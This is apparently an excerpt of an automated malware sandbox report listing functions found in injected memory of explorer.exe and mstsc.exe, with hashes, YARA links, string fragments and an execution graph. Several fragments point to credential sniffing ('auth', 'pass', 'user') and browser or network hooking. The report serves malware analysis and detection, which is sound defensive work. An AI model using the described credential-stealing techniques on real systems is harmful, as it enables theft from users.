                                                                                                              • Instruction ID: c0fedf32403be37ea46317f9f83b94546640c7cd1993eeae088c190a1d42db88
                                                                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                              • Instruction Fuzzy Hash: 7531063151CB485FC71AEB28D4846DAB7D0FB98300F504D1EE49BC7292EE30A94ACB47
                                                                                                              Function 0EA060C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                              • API String ID: 0-3434893486
                                                                                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                              • Instruction ID: 3cf643fc413368665451f3c858f511e554b975b3078bacf438ed2e872ff61d60
                                                                                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                              • Instruction Fuzzy Hash: F631C571518B486FD729DB24D5846DAB7D4FBD8300F504D1EE49BC7291EE30E906CA47
                                                                                                              Function 0EA01FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                              • API String ID: 0-3136806129
                                                                                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                              • Instruction ID: 3499e2c0b0c01930cc0403ef5778d2143fda2679da4746168fbf130d836c7a74
                                                                                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                              • Instruction Fuzzy Hash: 69315E30118B484FCB94EF689594BAAB6E1FBDC300F85497D944AC72A5DF30CE45CB56
                                                                                                              Function 0EA01FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                              • API String ID: 0-3136806129
                                                                                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                              • Instruction ID: c228c5986159818178e1f3cef8220d9172c497f66e0fe5e1b965acbba7a1eb2e
                                                                                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                              • Instruction Fuzzy Hash: 2C315C30118B484FC794EF689594BAAB6E1FBDC300F854A2D944AC72A5DF30CE45CB56
                                                                                                              Function 0EA048C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                              • API String ID: 0-319646191
                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                              • Instruction ID: 252fab98ef5b5fd37708c8fb5554fcf7e557e56410b3ab4462b234a26c8cfd41
                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                              • Instruction Fuzzy Hash: 8331C031614A0C8BCB14EFA8D9887EEB7E0FF5C305F40062AD45ED7280DE748A458799
                                                                                                              Function 0EA048BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                              • API String ID: 0-319646191
                                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                              • Instruction ID: dd58c8d5e6cfe7b52cbd06df2ab94a03c180e815e731b9ffd911d682c6bc72ff
                                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                              • Instruction Fuzzy Hash: 2E21C130A10A0C8ACB15EFA8D9847EDBBE0FF5C304F40462AE45AD7280DE749A058799
                                                                                                              Function 0EA05E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$l$l$t
                                                                                                              • API String ID: 0-168566397
                                                                                                              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                              • Instruction ID: 2cb9920457df53f4eed7ad3f580c3aa354477b3e2723a8f2a13753b6f3d9d635
                                                                                                              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                              • Instruction Fuzzy Hash: B5216870A24A0D9BDB48EFA8E1447EEBAF0FF5C300F504A2ED019D3650DB7499918B98
                                                                                                              Function 0EA05E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$l$l$t
                                                                                                              • API String ID: 0-168566397
                                                                                                              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                              • Instruction ID: b9fa317186af3fb086bdd9d65bb539f897e6e7a8c834a1846f5b5da74a256489
                                                                                                              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                              • Instruction Fuzzy Hash: 2E218B70A24A0D9BDB48EFA8E1447EEBBF0FF5C300F504A2ED019D3650DB7499518B98
                                                                                                              Function 0EA05FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: auth$logi$pass$user
                                                                                                              • API String ID: 0-2393853802
                                                                                                              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                              • Instruction ID: 96329c820ab751a1ddfe9436250cf5df74403da47523d4df140d695034dfbd7c
                                                                                                              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                              • Instruction Fuzzy Hash: 4021AE30624B0D8BCB05DF99A9907AEB7F1EF8C344F004619A40ADB284D7B1DD148BD6

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:0%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:24
                                                                                                              Total number of Limit Nodes:3
                                                                                                              execution_graph 95158 4bb2c0a 95159 4bb2c1f LdrInitializeThunk 95158->95159 95160 4bb2c11 95158->95160 95165 4bb2be0 LdrInitializeThunk 95167 4bb2380 95169 4bb23b7 95167->95169 95168 4bb2469 95180 4bae284 95168->95180 95169->95168 95173 4bae284 GetPEB GetPEB LdrInitializeThunk 95169->95173 95190 4bb2b60 LdrInitializeThunk 95169->95190 95191 4bb0424 18 API calls 95169->95191 95171 4bb247a 95188 4bb2b60 LdrInitializeThunk 95171->95188 95173->95169 95174 4bea2fb 95175 4bb2484 95175->95174 95189 4bae443 12 API calls 95175->95189 95179 4bb24a4 95183 4bae2b9 95180->95183 95181 4bae2cd GetPEB 95182 4bae2e1 95181->95182 95184 4bae3f0 95182->95184 95192 4bb2ad0 LdrInitializeThunk 95182->95192 95183->95181 95183->95184 95184->95171 95186 4bae3de GetPEB 95186->95184 95187 4bae308 95187->95186 95188->95175 95189->95179 95190->95169 95191->95169 95192->95187

                                                                                                              Executed Functions

                                                                                                              Function 04BB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 10 4bb2ca0-4bb2cac LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 62c631dc8b7a96b2383d4c2c544fbf4b12eb4da6f50761440250741d98972f91
                                                                                                              • Instruction ID: 9f8bea8f1d70daa21d8e3516a18f79438732c08dc67093a16ba90f7567088959
                                                                                                              • Opcode Fuzzy Hash: 62c631dc8b7a96b2383d4c2c544fbf4b12eb4da6f50761440250741d98972f91
                                                                                                              • Instruction Fuzzy Hash: CE90023220140402F100759954486460005CBE0306F55D055B5425556EC666D9926131
                                                                                                              Function 04BB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 9 4bb2c70-4bb2c7c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6c22168b7453dbe8e2616dc4b5a33a8b1f5d516ac122e06ddfcc707dc7e727ba
                                                                                                              • Instruction ID: 579b2acc7a6f4e6c1b50e0b8aeff1702f84d31be1219898c6c4a3104b0263a42
                                                                                                              • Opcode Fuzzy Hash: 6c22168b7453dbe8e2616dc4b5a33a8b1f5d516ac122e06ddfcc707dc7e727ba
                                                                                                              • Instruction Fuzzy Hash: 9F90023220148802F1107159844474A0005CBD0306F59C455B4825659D8696D9927121
                                                                                                              Function 04BB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 8 4bb2c60-4bb2c6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 50ab190d8131fb08d4875cf66240d5688dbd221e046846d3a8e89a5c382c03b6
                                                                                                              • Instruction ID: eacf0fb7d6ef4fa7b8657f2ceaf1d88cfde3d299aabf43d8265cff2a262c6965
                                                                                                              • Opcode Fuzzy Hash: 50ab190d8131fb08d4875cf66240d5688dbd221e046846d3a8e89a5c382c03b6
                                                                                                              • Instruction Fuzzy Hash: B190023220140842F10071594444B460005CBE0306F55C05AB0525655D8616D9527521
                                                                                                              Function 04BB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 13 4bb2df0-4bb2dfc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1c8f7ac18fc1b359dc676a7870e90773ada30f0c8ccd04b779b316b6e7df336b
                                                                                                              • Instruction ID: 2024d99c43a797471233114891ac649aaf59eabf07304c38615d6564e4d6b22f
                                                                                                              • Opcode Fuzzy Hash: 1c8f7ac18fc1b359dc676a7870e90773ada30f0c8ccd04b779b316b6e7df336b
                                                                                                              • Instruction Fuzzy Hash: 1E90023220140413F111715945447070009CBD0246F95C456B0825559D9657DA53A121
                                                                                                              Function 04BB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 12 4bb2dd0-4bb2ddc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: a80cdb65a26bd20ad5557b1619d806fb7eab432669fe21c45c9b9e26bd430d3b
                                                                                                              • Instruction ID: 5c11dd8bf3375c5c92604ff07889530391d845cfc13d4ed27af2225c07365aa0
                                                                                                              • Opcode Fuzzy Hash: a80cdb65a26bd20ad5557b1619d806fb7eab432669fe21c45c9b9e26bd430d3b
                                                                                                              • Instruction Fuzzy Hash: 29900222242441527545B15944445074006DBE0246795C056B1815951C8527E957D621
                                                                                                              Function 04BB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 17 4bb35c0-4bb35cc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
                                                                                                              • Instruction ID: 978233556863168cfab8ab09d7859f4bd39efe9ac5458393e2d3fb72496f6949
                                                                                                              • Opcode Fuzzy Hash: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
                                                                                                              • Instruction Fuzzy Hash: 2490023260550402F100715945547061005CBD0206F65C455B0825569D8796DA5265A2
                                                                                                              Function 04BB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 11 4bb2d10-4bb2d1c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
                                                                                                              • Instruction ID: b4568b6d7efd2003d1c94ad24b09464dc575bbff13fdfa87d143de6611dc15b5
                                                                                                              • Opcode Fuzzy Hash: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
                                                                                                              • Instruction Fuzzy Hash: 9B90022A21340002F1807159544860A0005CBD1207F95D459B0416559CC916D96A5321
                                                                                                              Function 04BB2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 14 4bb2ea0-4bb2eac LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: f938955935c1dcb8a13b729a15cdb7fbe4f791e2b2042c7512c08d691a72329c
                                                                                                              • Instruction ID: afacfacf4379239c15562f203afc51737ddccdf434a07a6123e635368f4532a7
                                                                                                              • Opcode Fuzzy Hash: f938955935c1dcb8a13b729a15cdb7fbe4f791e2b2042c7512c08d691a72329c
                                                                                                              • Instruction Fuzzy Hash: 2B90027220140402F140715944447460005CBD0306F55C055B5465555E865ADED66665
                                                                                                              Function 04BB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 16 4bb2fe0-4bb2fec LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
                                                                                                              • Instruction ID: 9073e522700ccb5ef3e230e9433c02f0f91ac53d4513890422ebee1854b5bc11
                                                                                                              • Opcode Fuzzy Hash: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
                                                                                                              • Instruction Fuzzy Hash: D2900222211C0042F20075694C54B070005CBD0307F55C159B0555555CC916D9625521
                                                                                                              Function 04BB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 15 4bb2f30-4bb2f3c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
                                                                                                              • Instruction ID: e869f75edb9196141ff962fefaeac7c76fd8f74f702ee236f51e07c66858da4d
                                                                                                              • Opcode Fuzzy Hash: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
                                                                                                              • Instruction Fuzzy Hash: E690026234140442F10071594454B060005CBE1306F55C059F1465555D861ADD536126
                                                                                                              Function 04BB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 4 4bb2ad0-4bb2adc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
                                                                                                              • Instruction ID: 63dd7a7dd45a34edcea541188d50320671919f631b49f9a3e8b4b5a42371b83d
                                                                                                              • Opcode Fuzzy Hash: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
                                                                                                              • Instruction Fuzzy Hash: B7900226211400032105B55907445070046CBD5356355C065F1416551CD622D9625121
                                                                                                              Function 04BB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 7 4bb2bf0-4bb2bfc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
                                                                                                              • Instruction ID: 29b1b5c4cc9ec08c622ab69677b13efb563721dd58366d4715035a020ec2a879
                                                                                                              • Opcode Fuzzy Hash: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
                                                                                                              • Instruction Fuzzy Hash: 4B90023220140802F1807159444464A0005CBD1306F95C059B0426655DCA16DB5A77A1
                                                                                                              Function 04BB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 6 4bb2be0-4bb2bec LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
